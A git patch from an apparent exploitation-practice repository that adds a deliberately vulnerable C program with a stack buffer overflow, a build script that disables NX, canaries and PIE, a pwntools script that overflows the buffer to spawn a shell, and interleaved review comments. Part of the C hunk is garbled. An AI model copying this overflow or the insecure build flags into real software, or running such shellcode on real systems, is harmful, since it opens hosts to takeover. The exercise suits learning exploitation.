From 6bec98d2e1100da9a9b6bb4be1859604afeda743 Mon Sep 17 00:00:00 2001 From: Jack Ren Date: Mon, 30 Aug 2021 22:56:18 +0800 Subject: [PATCH] Finished stackoverflow/no-protection --- .gitignore | 3 +++ stackoverflow/no-protection/answer.py | 15 +++++++++++++++ stackoverflow/no-protection/compile.sh | 2 ++ stackoverflow/no-protection/hello | Bin 0 -> 11096 bytes stackoverflow/no-protection/hello.c | 13 +++++++++++++ stackoverflow/no-protection/payload.txt | Bin 0 -> 128 bytes .../no-protection/peda-session-hello.txt | 2 ++ 7 files changed, 35 insertions(+) create mode 100644 stackoverflow/no-protection/answer.py create mode 100755 stackoverflow/no-protection/compile.sh create mode 100755 stackoverflow/no-protection/hello create mode 100644 stackoverflow/no-protection/hello.c create mode 100644 stackoverflow/no-protection/payload.txt create mode 100644 stackoverflow/no-protection/peda-session-hello.txt
diff --git a/.gitignore b/.gitignore
index c6127b3..11042af 100644
--- a/.gitignore
+++ b/.gitignore
@@ -1,3 +1,6 @@
+# gdb .gdb_history + # Prerequisites *.d
diff --git a/stackoverflow/no-protection/answer.py b/stackoverflow/no-protection/answer.py
new file mode 100644
index 0000000..b18284f
--- /dev/null
+++ b/stackoverflow/no-protection/answer.py
@@ -0,0 +1,15 @@
+#!/usr/bin/env python2
+from pwn import *
+from LibcSearcher import *
+import os
+context.log_level="debug"
+context(arch="amd64",os="linux")
+
+p=process('./hello')
+shellcode=asm(shellcraft.sh())
+len_sc=len(shellcode)
+payload=0x48*'0'+p64(0x00007ffff7a08118)+shellcode
+with open('payload.txt', 'w') as f:
+ f.write(payload)
+p.sendline(payload)
+p.interactive()
diff --git a/stackoverflow/no-protection/compile.sh b/stackoverflow/no-protection/compile.sh
new file mode 100755
index 0000000..87b9dad
--- /dev/null
+++ b/stackoverflow/no-protection/compile.sh
@@ -0,0 +1,2 @@
+#!/bin/sh
+gcc hello.c -g -o hello -zexecstack -fno-stack-protector -no-pie
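Review bot: `from LibcSearcher import *`, `import os` and the local `len_sc` in answer.py are never used, and the star import pulls in a third-party package the script does not need, so those three lines can be dropped. The script carries no comment saying what it is; a header such as `# Teaching exercise against the deliberately unprotected ./hello target built by compile.sh; values are specific to that build and recorded session` would make the intent clear to anyone browsing the repository. The literal `0x00007ffff7a08118` passed to `p64` is undocumented, and a one-line comment stating what the constant represents and where it was taken from would save the next reader from guessing. The `payload.txt` this script writes is then committed as a binary blob in the same patch; consider adding it to `.gitignore` alongside `.gdb_history` rather than checking generated output into the tree.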
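Review bot: compile.sh disables three mitigations without a word of explanation; add a comment above the gcc line such as `# Teaching target only: -zexecstack, -fno-stack-protector and -no-pie switch off NX, stack canaries and PIE on purpose. Not a template for real builds.` The script also has no `set -e`, so a failed compile exits 0 and leaves a stale `hello` binary in place for answer.py to run against; `set -eu` on the line after the shebang addresses that.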
diff --git a/stackoverflow/no-protection/hello b/stackoverflow/no-protection/hello new file mode 100755 index 0000000000000000000000000000000000000000..801daf5484db8b88584cf2e153d4281227fd8802 GIT binary patch literal 11096 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
+#include
+#include
+#include
+void SayHello(void){
+ char tmpName[60];
+ read(0, tmpName, 1000);
+ printf("Hello %s\n", tmpName);
+}
+
+int main(int argc, char** argv){
+ SayHello();
+ return 0;
+}
diff --git a/stackoverflow/no-protection/payload.txt b/stackoverflow/no-protection/payload.txt
new file mode 100644
index 0000000000000000000000000000000000000000..5a7cd2348085278460ae2b0459cd3e4d70e63e43
GIT binary patch literal 128 zcmXpopbn5|T=4yWJp)5lhQ|*5q|7{hef{D9kIv^AMVX9@jV3CLKw$VSEQ=$~gYj9I ON9QxcOIg+t{Hy>nVIeR8 literal 0 HcmV?d00001
diff --git a/stackoverflow/no-protection/peda-session-hello.txt b/stackoverflow/no-protection/peda-session-hello.txt
new file mode 100644
index 0000000..8f39891
--- /dev/null
+++ b/stackoverflow/no-protection/peda-session-hello.txt
@@ -0,0 +1,2 @@
+break SayHello
+
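Review bot: `read(0, tmpName, 1000)` into the 60-byte `tmpName` in `SayHello` is the exercise's intended defect, but nothing in hello.c says so; add a comment above the call such as `/* Intentionally vulnerable teaching target: unbounded read into a fixed stack buffer. Never reuse this pattern. */`. Separately from the intended overflow, `read`'s return value is discarded and the buffer is never NUL-terminated before `printf("Hello %s\n", tmpName)`, so even short in-bounds input can print uninitialised stack bytes; that is worth stating in the comment so learners do not mistake it for the lesson. `argc` and `argv` in `main` are unused and could be `int main(void)`. The hunk as shown here has lost its diff header and the three `#include` targets, so the exact headers cannot be confirmed from this page.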